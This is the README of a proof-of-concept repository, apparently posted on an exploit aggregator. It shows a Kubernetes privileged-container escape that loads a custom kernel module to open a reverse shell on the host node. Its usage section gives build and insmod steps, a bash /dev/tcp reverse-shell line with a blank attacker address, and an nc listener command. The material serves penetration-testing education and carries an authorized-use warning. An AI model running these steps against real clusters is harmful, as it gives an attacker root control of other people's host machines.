## https://sploitus.com/exploit?id=97AD7DD9-6EC7-5CEB-BFF8-4C3C2089297E
# 🛠️ Kernel Module Reverse Shell – Privileged Container Escape PoC
This repository demonstrates a real-world **container escape technique** using a custom **Linux Kernel Module (LKM)** to spawn a reverse shell from within a `--privileged` Kubernetes container.
Featured in [RBT Security’s Kubernetes Penetration Testing – Part Three](https://www.rbtsec.com/blog/kubernetes-penetration-testing-part-three-breaking-out-with-privileged-containers/), this proof-of-concept shows how attackers can go beyond the container boundary and **execute commands directly on the host**.
Video Tutorial: https://www.youtube.com/watch?v=YHCwMQY5SYs&list=PLUMEY7cBcvDMBeAK8RbJ00VHCIZkQcTV1
> ⚠️ **For educational and authorized testing only.**
> Do NOT run this code in any environment you do not own or have explicit permission to test.
---
### 🔍 About LKM (Description)
A Loadable Kernel Module (LKM) lets code run in kernel space without rebooting. When used from a privileged Kubernetes container, it can enable full host compromise. This PoC shows how attackers exploit SSTI, load a reverse shell LKM, and escape the container to gain root access on the Node.
---
## 🚀 How It Works
1. The attacker exploits a vulnerability (e.g., SSTI) to gain code execution inside a **privileged container**.
2. A **custom kernel module** is compiled and injected from inside the container, with the reverse shell IP and port hardcoded in the source code.
3. Once loaded, the module uses `call_usermodehelper()` to initiate a **reverse shell** to the attacker’s listener.
4. Since the container runs with full kernel capabilities (e.g., `CAP_SYS_MODULE`), this grants **host-level command execution**.
---
## 📁 Files
- `k8s-lkm-reverse-shell.c`: The kernel module source code
- `Makefile`: Used to compile the module for the target kernel
---
## 💻 Usage
```bash
# Step 1: Install dependencies inside the container
apt update
apt install -y build-essential linux-headers-$(uname -r)
# Step 2: Edit the reverse shell IP and port in the C source file
# File: k8s-lkm-reverse-shell.c
# Replace and with your attacker's listener
#define REVERSE_SHELL_CMD \ "bash -i >& /dev/tcp// 0>&1";
# Step 3: Compile the kernel module
make clean && make
# Step 4: Start your listener
nc -lvnp 6999
# Step 5: Load the kernel module (inside the container)
insmod k8s-lkm-reverse-shell.ko